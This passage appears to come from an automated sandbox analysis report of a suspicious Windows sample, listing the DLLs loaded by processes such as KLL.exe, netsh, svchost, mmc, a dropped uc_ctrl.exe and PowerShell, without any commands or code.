Source: C:\Users\user\Desktop\KLL.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\KLL.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcndmgr.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: uc_guilib.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcbase.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: ninput.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mmcndmgr.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\mmc.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: userenv.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: propsys.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: dwmapi.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: oleacc.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: version.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: shfolder.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: wldp.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: profapi.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: riched20.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: usp10.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: msls31.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: textinputframework.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: coreuicomponents.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: coremessaging.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: wintypes.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: textshaping.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: linkinfo.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: ntshrui.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: srvcli.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: cscapi.dll
Source: C:\ProgramData\letsvpn-latest.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
